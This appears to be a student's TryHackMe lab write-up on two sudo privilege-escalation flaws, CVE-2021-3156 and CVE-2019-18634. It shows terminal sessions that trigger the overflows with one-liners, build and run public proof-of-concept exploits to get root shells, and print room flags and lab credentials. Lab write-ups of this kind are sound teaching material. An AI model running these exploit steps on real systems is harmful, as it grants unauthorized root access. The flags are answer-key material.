The stack is a very regimented section of memory which stores various important aspects of a program. The heap, on the other hand, is reserved for dynamic allocation of memory, allowing for more flexibility in how values and constructs are created and accessed by a program.
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
_____ _ _ _ __ __
|_ _| __ _ _| | | | __ _ ___| | _| \/ | ___
| || '__| | | | |_| |/ _` |/ __| |/ / |\/| |/ _ \
| || | | |_| | _ | (_| | (__| <| | | | __/
|_||_| \__, |_| |_|\__,_|\___|_|\_\_| |_|\___|
|___/
tryhackme@CVE-2021-3156:~$ ls
Exploit
tryhackme@CVE-2021-3156:~$ pwd
/home/tryhackme
tryhackme@CVE-2021-3156:~$ sudoedit -s '\' $(python3 -c 'print("A"
*1000)')
malloc(): memory corruption
Aborted (core dumped)
tryhackme@CVE-2021-3156:~$ ls
Exploit
tryhackme@CVE-2021-3156:~$ cd Exploit
tryhackme@CVE-2021-3156:~/Exploit$ ls
Makefile README.md hax.c lib.c
tryhackme@CVE-2021-3156:~/Exploit$ make
rm -rf libnss_X
mkdir libnss_X
gcc -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
tryhackme@CVE-2021-3156:~/Exploit$ ls
Makefile hax.c libnss_X
README.md lib.c sudo-hax-me-a-sandwich
tryhackme@CVE-2021-3156:~/Exploit$ ./sudo-hax-me-a-sandwich
** CVE-2021-3156 PoC by blasty <peter@haxx.in>
usage: ./sudo-hax-me-a-sandwich <target>
available targets:
------------------------------------------------------------
0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27
1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28
----------------------
After compiling the exploit, what is the name of the executable created (blurred in the screenshots above)? sudo-hax-me-a-sandwich
There are currently three targets which this exploit will work against. The machine we deployed is an Ubuntu 18.04.5 server, so we will use target 0.
When executed with the target specified as a parameter, we gain a root shell!
tryhackme@CVE-2021-3156:~/Exploit$ ./sudo-hax-me-a-sandwich 0
** CVE-2021-3156 PoC by blasty <peter@haxx.in>
using target: 'Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-
2.27'
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
# id
uid=0(root) gid=0(root) groups=0(root),1000(tryhackme)
# whoami
root
# ls
Makefile hax.c libnss_X
README.md lib.c sudo-hax-me-a-sandwich
# cat /root/flag.txt
THM{NmU4OWYwMWJmMjkxMDdiYTU4MWIxNWVk}
In the Security Bypass room I mentioned briefly that you can add things to the /etc/sudoers file in order to give lower-privileged users extra permissions. For this exploit we're more interested in one of the other options available: specifically an option called pwfeedback. This option is purely aesthetic, and is usually turned off by default (with the exception of ElementaryOS and Linux Mint - although they will likely now also stop using it). If you have used Linux before then you might have noticed that passwords typed into the terminal usually don't show any output at all; pwfeedback makes it so that whenever you type a character, an asterisk is displayed on the screen. Inside the /etc/sudoers file it is specified like this:
┌──(kali㉿kali)-[~]
└─$ ssh tryhackme@10.10.228.51 -p 4444
The authenticity of host '[10.10.228.51]:4444 ([10.10.228.51]:4444)' can't be established.
ED25519 key fingerprint is SHA256:N7uWsmLfwBGC/fYDW0WAKrZ3MXS/Ksh/moMD5kTc+aM.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.228.51]:4444' (ED25519) to the list of known hosts.
tryhackme@10.10.228.51's password: tryhackme
Last login: Sat Feb 8 05:00:59 2020 from 192.168.1.209
Here's the catch. When this option is turned on, it's possible to perform a buffer overflow attack on the sudo command. To explain it really simply, when a program accepts input from a user it stores the data in a set size of storage space.
***A buffer overflow attack is when you enter so much data into the input that it spills out of this storage space and into the next "box," overwriting the data in it. ***
As far as we're concerned, this means if we fill the password box of the sudo command up with a lot of garbage, we can inject our own stuff in at the end. This could mean that we get a shell as root! This exploit works regardless of whether we have any sudo permissions to begin with, unlike in CVE-2019-14287 where we had to have a very specific set of permissions in the first place.
Here's a proof of concept:
tryhackme@sudo-bof:~$ cat /etc/sudoers
cat: /etc/sudoers: Permission denied
tryhackme@sudo-bof:~$ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id
[sudo] password for tryhackme: Segmentation fault
n this command we're using the programming language Perl to generate a lot of information which we're then passing into the sudo command as a password using the pipe (|) operator. Notice that this doesn't actually give us root permissions -- instead it shows us an error message: Segmentation fault, which basically means that we've tried to access some memory that we weren't supposed to be able to access. This proves that a buffer overflow vulnerability exists: now we just need to exploit it!
This is a program written in C that exploits CVE-2019-18634. In reality BOF attacks are considerably more complicated than in the explanation above, so we're not going to go into a huge amount of detail about what the program is doing exactly, but you can imagine that it's doing the same thing as in the explanation: filling the password field with rubbish information, then overwriting something more important that's in the next "box" with code that gives us a root shell.
I've already uploaded a compiled copy of the code into the VM, so all you need to do is run it. This next section is interesting (and useful if you ever need to use this program for a CTF or other hacking challenge), but not essential for completing the room. This is the process that you would use if you were to download and compile the program for yourself:
First you download the program (in this case I used wget to do it in the terminal). The source code can be found on Saleem's github, so if you're interested, I would highly recommend reading through the code to see what it does!
Next you compile the program. I've used gcc to compile the exploit: gcc -o <output-file> <source-file>
Notice that there are two files in the directory -- a blue coloured file called exploit which is our compiled executable, and a white coloured file called exploit.c which is the original source file.
You would then upload the file into the target machine and run it:
As I said earlier, I have already done the compilation and upload for you. All you need to do is login to the machine and run the exploit, just to see it working for yourself.
──(kali㉿kali)-[~/Downloads]
└─$ scp -P 4444 tryhackme@10.10.228.51:/home/tryhackme/exploit /home/kali/Downloads
tryhackme@10.10.228.51's password:
exploit 100% 17KB 25.5KB/s 00:00
┌──(kali㉿kali)-[~/Downloads]
└─$ ls
1.pdf Ghostcat-CNVD-2020-10487 PurgeIrrelevantData_1826.ps1
1.tar Git_Happens responder_ntlm_hash
46635.py hash reverse.exe
alice_key hashes.txt reverse.msi
backdoors hash.txt robert_ssh.txt
backup.zip hydra.restore SAM
buildscript.sh ICS_plant shadow.txt
Chankro id_rsa SharpGPOAbuse
cracking.txt id_rsa_robert SharpGPOAbuse.exe
credential.pgp key shell.php
CustomerDetails.xlsx KIBA socat
CustomerDetails.xlsx.gpg Lian_Yu solar_log4j
DDOS linpeas.sh startup.bat
Devservice.exe malicioso.png SYSTEM
DNS_MANIPUL Market_Place system.txt
download.dat NAX teaParty
download.dat2 overpass2.pcapng tryhackme.asc
downloads overpass.go walrus_and_the_carpenter.py
Empire PHishing Windows_priv
exploit PRET Witty
exploit_commerce.py priv.key WittyAle.ovpn
***in my machine not available is only for old **
ryhackme@sudo-bof:~$ python3 -m http.server
-bash: python3: command not found
tryhackme@sudo-bof:~$ python -m SimpleHTTPServer
-bash: python: command not found
tryhackme@sudo-bof:~$ pwd
/home/tryhackme
tryhackme@sudo-bof:~$ ./exploit
[sudo] password for tryhackme:
Sorry, try again.
# whoami
root
# cat /root/root.txt
THM{buff3r_0v3rfl0w_rul3s}
#
[[CCT2019]]